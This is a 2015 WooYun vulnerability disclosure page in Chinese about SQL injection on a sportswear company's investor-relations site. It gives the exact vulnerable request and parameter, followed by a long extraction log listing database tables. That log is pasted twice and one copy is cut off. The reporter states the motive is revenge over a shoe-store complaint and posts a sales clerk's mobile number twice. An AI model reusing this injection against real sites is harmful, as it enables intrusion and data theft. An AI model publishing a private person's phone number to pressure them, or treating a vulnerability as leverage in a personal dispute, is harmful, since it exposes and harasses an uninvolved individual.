当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114995

漏洞标题:安踏某站SQL注入

相关厂商:anta.com

漏洞作者: 路人甲

提交时间:2015-05-20 09:37

修复时间:2015-07-04 10:40

公开时间:2015-07-04 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

安踏复仇之战(在史各庄安踏专卖店被坑,请给我个说)

详细说明:

买了一双安踏的鞋,么有过15天就断面了,去店面理论,一直说店长不在,已经拖了5天了,至今没有结果
营业员手机号
13601110452
SQL注入漏洞
GET /en/home.php?id=4&Itemid=3&option=3&year=2010 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://ir.anta.com/
Host: ir.anta.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
注入参数 year

漏洞证明:

当前数据库
tomocms2
[04:27:44] [INFO] retrieving the length of query output
[04:27:44] [INFO] retrieved: 10
[04:28:33] [INFO] retrieved: alert_form
[04:28:33] [INFO] retrieving the length of query output
[04:28:33] [INFO] retrieved: 12
[04:29:34] [INFO] retrieved: client_index
[04:29:34] [INFO] retrieving the length of query output
[04:29:34] [INFO] retrieved: 11
[04:30:32] [INFO] retrieved: client_info
[04:30:32] [INFO] retrieving the length of query output
[04:30:32] [INFO] retrieved: 13
[04:31:44] [INFO] retrieved: client_indoen
[04:31:44] [INFO] retrieving the length of query output
[04:31:44] [INFO] retrieved: 13
[04:33:42] [INFO] retrieved: client_infosc
[04:33:42] [INFO] retrieving the length of query output
[04:33:42] [INFO] retrieved: 13
[04:34:55] [INFO] retrieved: client_infotc
[04:34:55] [INFO] retrieving the length of query output
[04:34:55] [INFO] retrieved: 9
[04:35:38] [INFO] retrieved: cms_alert
[04:35:38] [INFO] retrieving the length of query output
[04:35:38] [INFO] retrieved: 11
[04:36:19] [INFO] retrieved: cms_content
[04:36:19] [INFO] retrieving the length of query output
[04:36:19] [INFO] retrieved: 15
[04:37:21] [INFO] retrieved: cms_content_115
[04:37:21] [INFO] retrieving the length of query output
[04:37:21] [INFO] retrieved: 13
[04:38:13] [INFO] retrieved: cms_content_3
[04:38:13] [INFO] retrieving the length of query output
[04:38:13] [INFO] retrieved: 15
[04:39:19] [INFO] retrieved: cms_content_312
[04:39:19] [INFO] retrieving the length of query output
[04:39:19] [INFO] retrieved: 15
[04:40:18] [INFO] retrieved: cms_content_313
[04:40:18] [INFO] retrieving the length of query output
[04:40:18] [INFO] retrieved: 15
[04:41:16] [INFO] retrieved: cms_content_314
[04:41:16] [INFO] retrieving the length of query output
[04:41:16] [INFO] retrieved: 14
[04:42:20] [INFO] retrieved: cms_content_38
[04:42:20] [INFO] retrieving the length of query output
[04:42:20] [INFO] retrieved: 16
[04:43:33] [INFO] retrieved: cms_content_3_38
[04:43:33] [INFO] retrieving the length of query output
[04:43:33] [INFO] retrieved: 18
[04:45:21] [INFO] retrieved: cms_content_3_4_38
[04:45:21] [INFO] retrieving the length of query o
04:27:44] [INFO] retrieving the length of query output
[04:27:44] [INFO] retrieved: 10
[04:28:33] [INFO] retrieved: alert_form
[04:28:33] [INFO] retrieving the length of query output
[04:28:33] [INFO] retrieved: 12
[04:29:34] [INFO] retrieved: client_index
[04:29:34] [INFO] retrieving the length of query output
[04:29:34] [INFO] retrieved: 11
[04:30:32] [INFO] retrieved: client_info
[04:30:32] [INFO] retrieving the length of query output
[04:30:32] [INFO] retrieved: 13
[04:31:44] [INFO] retrieved: client_indoen
[04:31:44] [INFO] retrieving the length of query output
[04:31:44] [INFO] retrieved: 13
[04:33:42] [INFO] retrieved: client_infosc
[04:33:42] [INFO] retrieving the length of query output
[04:33:42] [INFO] retrieved: 13
[04:34:55] [INFO] retrieved: client_infotc
[04:34:55] [INFO] retrieving the length of query output
[04:34:55] [INFO] retrieved: 9
[04:35:38] [INFO] retrieved: cms_alert
[04:35:38] [INFO] retrieving the length of query output
[04:35:38] [INFO] retrieved: 11
[04:36:19] [INFO] retrieved: cms_content
[04:36:19] [INFO] retrieving the length of query output
[04:36:19] [INFO] retrieved: 15
[04:37:21] [INFO] retrieved: cms_content_115
[04:37:21] [INFO] retrieving the length of query output
[04:37:21] [INFO] retrieved: 13
[04:38:13] [INFO] retrieved: cms_content_3
[04:38:13] [INFO] retrieving the length of query output
[04:38:13] [INFO] retrieved: 15
[04:39:19] [INFO] retrieved: cms_content_312
[04:39:19] [INFO] retrieving the length of query output
[04:39:19] [INFO] retrieved: 15
[04:40:18] [INFO] retrieved: cms_content_313
[04:40:18] [INFO] retrieving the length of query output
[04:40:18] [INFO] retrieved: 15
[04:41:16] [INFO] retrieved: cms_content_314
[04:41:16] [INFO] retrieving the length of query output
[04:41:16] [INFO] retrieved: 14
[04:42:20] [INFO] retrieved: cms_content_38
[04:42:20] [INFO] retrieving the length of query output
[04:42:20] [INFO] retrieved: 16
[04:43:33] [INFO] retrieved: cms_content_3_38
[04:43:33] [INFO] retrieving the length of query output
[04:43:33] [INFO] retrieved: 18
[04:45:21] [INFO] retrieved: cms_content_3_4_38
[04:45:21] [INFO] retrieving the length of query output
[04:45:21] [INFO] retrieved: 13
[04:46:29] [INFO] retrieved: cms_content_4
[04:46:29] [INFO] retrieving the length of query output
[04:46:29] [INFO] retrieved: 13
[04:47:44] [INFO] retrieved: cms_content_5
[04:47:44] [INFO] retrieving the length of query output
[04:47:44] [INFO] retrieved: 13
[04:48:19] [INFO] retrieved: cms_content_7
[04:48:19] [INFO] retrieving the length of query output
[04:48:19] [INFO] retrieved: 14
[04:49:08] [INFO] retrieved: cms_content_76
[04:49:08] [INFO] retrieving the length of query output
[04:49:08] [INFO] retrieved: 16
[04:50:17] [INFO] retrieved: cms_content_7_76
[04:50:17] [INFO] retrieving the length of query output
[04:50:17] [INFO] retrieved: 18
[04:51:22] [INFO] retrieved: cms_content_delete
[04:51:22] [INFO] retrieving the length of query output
[04:51:22] [INFO] retrieved: 21
[04:52:47] [INFO] retrieved: cms_content_highlight
[04:52:47] [INFO] retrieving the length of query output
[04:52:47] [INFO] retrieved: 15
[04:53:41] [INFO] retrieved: cms_content_jrj
[04:53:41] [INFO] retrieving the length of query output
[04:53:41] [INFO] retrieved: 16
[04:54:42] [INFO] retrieved: cms_content_scio
[04:54:42] [INFO] retrieving the length of query output
[04:54:42] [INFO] retrieved: 10
[04:55:34] [INFO] retrieved: cms_header
[04:55:34] [INFO] retrieving the length of query output
[04:55:34] [INFO] retrieved: 17
[04:56:35] [INFO] retrieved: cms_header_client
[04:56:35] [INFO] retrieving the length of query output
[04:56:35] [INFO] retrieved: 9
[04:57:07] [INFO] retrieved: cms_index
[04:57:07] [INFO] retrieving the length of query output
[04:57:07] [INFO] retrieved: 16
[04:57:57] [INFO] retrieved: cms_index_client
[04:57:57] [INFO] retrieving the length of query output
[04:57:57] [INFO] retrieved: 8
[04:58:27] [INFO] retrieved: cms_info
[04:58:27] [INFO] retrieving the length of query output
[04:58:27] [INFO] retrieved: 15
[04:59:29] [INFO] retrieved: cms_info_client
[04:59:29] [INFO] retrieving the length of query outpu

修复方案:

给我个说法

11111.JPG


营业员手机号
13601110452

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-20 10:38

厂商回复:

如果对产品有任何问题,可直接拔打我们的客户服务热线400-885-6000,有专门的客服会处理您的问题。同时,如果您方便,也可以私信提供给我你的联系方式,我也可以让客服主动联系你处理。给您造成的不便,请见谅。

最新状态:

暂无